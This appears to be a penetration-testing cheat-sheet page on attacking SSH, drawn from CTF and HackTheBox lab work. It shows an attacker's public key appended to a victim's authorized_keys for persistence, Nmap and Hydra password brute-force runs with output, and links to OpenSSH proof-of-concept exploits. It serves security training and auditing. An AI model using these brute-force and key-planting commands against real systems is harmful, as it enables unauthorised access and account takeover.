SSH (22)

Service

service ssh start
#Verification
netstat -antp | grep sshd

Keys

SSH Connection

chmod 600 id_rsa
ssh -i id_rsa user@host -p port

Generate Keys

0xSs0rZ@pico-2018-shell:~$ ssh-keygen -t rsa                                                                   
Generating public/private rsa key pair.                                                                        
Enter file in which to save the key (/home/0xSs0rZ/.ssh/id_rsa):                                               
Enter passphrase (empty for no passphrase):                                                                    
Enter same passphrase again:                                                                                   
Your identification has been saved in /home/0xSs0rZ/.ssh/id_rsa.                                               
Your public key has been saved in /home/0xSs0rZ/.ssh/id_rsa.pub.                                               
The key fingerprint is:                                                                                        
SHA256:YPsf7PTkrxc7owo8NkyxQVnfL3ZOS3xf+YDmJNVcMR0 0xSs0rZ@pico-2018-shell                                     
The key's randomart image is:                                                                                  
+---[RSA 2048]----+                                                                                            
|        .o.    E=|                                                                                            
|       ..  . + .o|                                                                                            
|      o o   o +  |                                                                                            
|     . o + . ....|                                                                                            
|      . S . + ++*|                                                                                            
|       = . = .o**|                                                                                            
|        O + o  ++|                                                                                            
|       . B =  =  |                                                                                            
|          +.==.o |                                                                                            
+----[SHA256]-----+                                                                                            
0xSs0rZ@pico-2018-shell:~$ cd /home/0xSs0rZ/.ssh                                                               
0xSs0rZ@pico-2018-shell:~/.ssh$                                                                                
0xSs0rZ@pico-2018-shell:~/.ssh$  ls                                                                            
id_rsa  id_rsa.pub                                                                                             
0xSs0rZ@pico-2018-shell:~/.ssh$ cp id_rsa.pub ~/.ssh/authorized_keys                                           
0xSs0rZ@pico-2018-shell:~/.ssh$ ssh -i id_rsa 0xSs0rZ@localhost                                                
The authenticity of host 'localhost (127.0.0.1)' can't be established.                                         
ECDSA key fingerprint is SHA256:1/2OUR2IggrhZwLysFuJlUZ169yf1BFVeTIDW8Fo5XU.                                   
Are you sure you want to continue connecting (yes/no)? yes                                                     
Warning: Permanently added 'localhost' (ECDSA) to the list of known hosts.                                     
picoCTF{quelquechose}  

Authorized-Keys

# Atacker
root@Host-001:~/Bureau/htb# cat traceback.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001
root@Host-001:~/Bureau/htb#

# Victim
webadmin@traceback:/home/webadmin/.ssh$ echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDsgaUFHPKR6TQf7rXuPcaSXyujJaBUvFlPWCYDeVR5adR+bHOh508cgCn9HxC79hNCPtv1a+8uRdK/0Ana1GMa35F2ugEMtHzoAjQA3zdrDRu7GS1LL/VdGqa9PMn3jKOzV1FZJrrqxqfSMhOsLXMkFJatjiSAjV0tmd8AI16p7C8nIbFmVfVHp3sLyzeB3VN6dKtFpCiWmmrdMDv5Nta9Y2FCKL20vo+dQvpfZPSPn5SzZjbpv5ITiPUdaKB2e+E4dDihuFE/VubKEWM71ns5xUPRb3DB4o5NrH8iE68/5BBUu3OT9fmo6FTUg2WsJzTZOThQQrADRNISnY9zD642pUHuT33+3JHj9XTWyojl4QYQQKENvL+rY31eGtkrvQYBXIAOvZV9KL9CNVFQb9ix5V8vCGsrG8slOpW3RaIAyJ5tm+mnWPO+P23tsdQsOudYbQE1sNdQfN/zOEqMgcfZG/3g5REqqSOAA6w0xjoJThKpYtKUvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys
<UvUdk2vePWA0bGb8= root@Host-001" >> authorized_keys
webadmin@traceback:/home/webadmin/.ssh$ 

# Connection
root@Host-001:~/Bureau/htb# ssh -i traceback webadmin@10.10.10.181

Pseudo-Terminal

ssh -t bandit18@localhost /bin/sh

SSL Encryption

echo pass | openssl s_client -quiet -connect localhost:30001

Generate key

ssh-keygen

Generating public/private rsa key pair.
Enter file in which to save the key (/home/parrot/.ssh/id_rsa): 
Enter passphrase (empty for no passphrase):
Enter same passphrase again:

Your identification has been saved in /home/parrot/.ssh/id_rsa
Our public key has been saved in /home/parrot/.ssh/id_rsa.pub
The key fingerprint is:
SHA256:...SNIP... parrot@parrot
The key's randomart image is:
+---[RSA 3072]----+
|            o..  |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|     ...SNIP     |
|       + +oo+o   |
+----[SHA256]-----+

SSH with a key id_rsa

[Apr 06, 2024 - 07:50:27 (EDT)] exegol-CPTS /workspace # chmod 600 id_rsa              
[Apr 06, 2024 - 07:52:03 (EDT)] exegol-CPTS /workspace # ssh -i id_rsa ceil@10.129.42.195

Metasploit

SSHMetasploit Documentation Penetration Testing Software, Pen Testing Security

Dangerous settings

Setting	Description
PasswordAuthentication yes	Allows password-based authentication.
PermitEmptyPasswords yes	Allows the use of empty passwords.
PermitRootLogin yes	Allows to log in as the root user.
Protocol 1	Uses an outdated version of encryption.
X11Forwarding yes	Allows X11 forwarding for GUI applications.
AllowTcpForwarding yes	Allows forwarding of TCP ports.
PermitTunnel	Allows tunneling.
DebianBanner yes	Displays a specific banner when logging in.

CVE-2025-26465

The OpenSSH client contains a logic error between versions 6.8p1 to 9.9p1 (inclusive) that makes it vulnerable to an active MitM attack if the VerifyHostKeyDNS option is enabled

GitHub - rxerium/CVE-2025-26465: MitM attack allowing a malicious interloper to impersonate a legitimate server when a client attempts to connect to itGitHub

nuclei -u yourHost.com -t template.yaml

CVE-2024-6387 - regreSSHion

OpenSSH RCE

GitHub - anhvutuan/CVE-2024-6387-poc-1: CVE-2024-6387, also known as RegreSSHion, is a high-severity vulnerability found in OpenSSH servers (sshd) running on glibc-based Linux systems. It is a regression of a previously fixed vulnerability (CVE-2006-5051), which means the issue was reintroduced in newer versions of OpenSSH.GitHub

GitHub - xaitax/CVE-2024-6387_Check: CVE-2024-6387_Check is a lightweight, efficient tool designed to identify servers running vulnerable versions of OpenSSHGitHub

GitHub - asterictnl-lvdw/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)GitHub

GitHub - YassDEV221608/CVE-2024-6387_PoCGitHub

SSH Audit

$ git clone https://github.com/jtesta/ssh-audit.git && cd ssh-audit
$ ./ssh-audit.py 10.129.14.132

Change Authentication Method

$ ssh -v cry0l1t3@10.129.14.132

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config 
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive

For potential brute-force attacks, we can specify the authentication method with the SSH client option PreferredAuthentications.

$ ssh -v cry0l1t3@10.129.14.132 -o PreferredAuthentications=password

OpenSSH_8.2p1 Ubuntu-4ubuntu0.3, OpenSSL 1.1.1f  31 Mar 2020
debug1: Reading configuration data /etc/ssh/ssh_config
...SNIP...
debug1: Authentications that can continue: publickey,password,keyboard-interactive
debug1: Next authentication method: password

cry0l1t3@10.129.14.132's password:

Bruteforce

SSH Bruteforce

Nmap

[Apr 06, 2024 - 10:09:33 (EDT)] exegol-CPTS /workspace # nmap 10.129.202.20 -sV -p22 --script ssh-brute
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-06 10:09 EDT
NSE: [ssh-brute] Trying username/password pair: root:root
NSE: [ssh-brute] Trying username/password pair: admin:admin
NSE: [ssh-brute] Trying username/password pair: administrator:administrator
NSE: [ssh-brute] Trying username/password pair: webadmin:webadmin
NSE: [ssh-brute] Trying username/password pair: sysadmin:sysadmin
NSE: [ssh-brute] Trying username/password pair: netadmin:netadmin
NSE: [ssh-brute] Trying username/password pair: guest:guest
NSE: [ssh-brute] Trying username/password pair: user:user
NSE: [ssh-brute] Trying username/password pair: web:web
NSE: [ssh-brute] Trying username/password pair: test:test
NSE: [ssh-brute] Trying username/password pair: root:
NSE: [ssh-brute] Trying username/password pair: admin:
NSE: [ssh-brute] Trying username/password pair: administrator:
NSE: [ssh-brute] Trying username/password pair: webadmin:

Hydra - See Brute force - SSH

$ hydra -L user.list -P password.list ssh://10.129.42.197

Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-01-10 15:03:51
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 25 login tries (l:5/p:5), ~2 tries per task
[DATA] attacking ssh://10.129.42.197:22/
[22][ssh] host: 10.129.42.197   login: user   password: password
1 of 1 target successfully completed, 1 valid password found

SSH on Windows

Binaries:

GitHub - PowerShell/Win32-OpenSSH: Win32 port of OpenSSHGitHub

Install SSH on Windows:

Installing SFTP/SSH Server on Windows using OpenSSH :: WinSCP

Execute command - Windows

Ssh | LOLBAS

Interesting Books

Interesting Books

Disclaimer: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.

• The Art of Network Penetration Testing A guide to simulating an internal security breach. You’ll take on the role of the attacker and work through every stage of a professional pentest, from information gathering to seizing control of a system and owning the network.
• Network Basics for Hackers The book offers one of the most complete and in-depth analyses of Wi-Fi and Bluetooth networks, then progresses through the various protocols such as DNS, ARP, SMTP, and others.

Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.